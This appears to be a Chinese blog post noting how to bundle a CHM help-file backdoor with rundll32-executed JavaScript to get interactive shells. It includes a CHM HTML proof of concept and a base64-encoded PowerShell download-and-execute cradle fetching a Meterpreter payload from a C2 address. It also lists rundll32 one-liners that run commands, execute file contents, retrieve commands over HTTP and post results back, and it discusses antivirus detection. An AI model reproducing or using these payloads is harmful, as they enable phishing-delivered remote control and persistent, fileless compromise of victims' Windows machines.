学了一波evi1cg博客上的捆绑后门,做个记录

0x01 思路

思路:
利用CHM后门调用rundll32.exe执行javascript获取恶意代码并执行

结果:
交互式shell or meterpreter(poershell)

0x02 chm后门

calc.exe P0c

1
2
3
4
5
6
7
8
9
10
11
12
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

利用EasyCHM编译html文件

运行:
1917e96c5ce843b5730a1a09cab0bfa9

0x03 JS后门

核心思路:rundll32.exe 执行 javascript 脚本 访问C&C执行恶意代码

Poc:

1
2
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert
('foo');

f4f3d68173b359419c24507b1f942ec0

0x04 CHM + JS 捆绑

思路:
CHM后门 —-> 调用rundll32.exe —–> 调用javascript. —–> 访问目标C2服务器 ——>执行恶意代码 —–> 交互式shell

优点:
防止传统CHM后门使用CMD /c 时引起的弹窗

缺点:

直接获取Meterpreter Session

使用Exploit : exploit/multi/script/web_delivery
cacd683f6c64c4a3651f0572cdd12349

存在特殊字符,在cmd下是不能直接运行的,使用Base64编码:
c54ede5591f858d718b4b01409b5aba3

Powershell :

1
powershell -ep bypass -enc PQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAzADoAOAAwADgAMQAvADEALwAnACkAOwAKAA==

But:
abcd0e35e422a4dc7c13de7884d4bb7f

并不能bypass 360主防
允许程序执行后,可得到JSRAT Session 以及 meterpreter Session
0081d77c6169108109e646204a07b69a

主要还是检测了rundll32.exe 这个敏感进程

c4f1838a6afa2810a377bde24e717b33

0x05 总结

JS后门优点:

  1. 无文件落地
  2. 持续控制
  3. 后台rundll32.exe进程稳定

缺点:
不免杀,容易被检测

CHM后门优点:
钓鱼强
不会被AV检测,只会在调用危险进程时被检测,本身不含有恶意代码

配合可以达到nishang中不弹窗的效果

0x06 JS backdoor Tips

//Execute A Command

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc");

//Write To A File

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";fso=new%20ActiveXObject("Scripting.FileSystemObject");a=fso.CreateTextFile("c:\\Temp\\testfile.txt",true);a.WriteLine("Test");a.Close();self.close;

//Read and Execute From A File

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\\Temp\\testfile.txt",1);eval((f.ReadAll()));

//Map A Remote Share (WEBDAV)

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","https://live.sysinternals.com");self.close;

//Map A Local Share

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","\\\\Localhost\\c$");self.close;

//Read and Execute Commands From A File

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\\Temp\\Commands.txt",1);while(!f.AtEndOfStream){t=new%20ActiveXObject("WScript.Shell");t.Run("cmd%20/c%20"%20+%20f.ReadLine(),null,true);};

//Retrieve Commands From HTTP

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1/a.txt",false);h.Send();B=h.ResponseText;alert(B);

//POST results back to Server

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("POST","http://127.0.0.1:8081/a.php",false);h.Send("Stuff");

https://evi1cg.me/archives/chm_backdoor.html
http://drops.wooyun.org/tips/8568
https://github.com/Ridter/MyJSRat
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/12386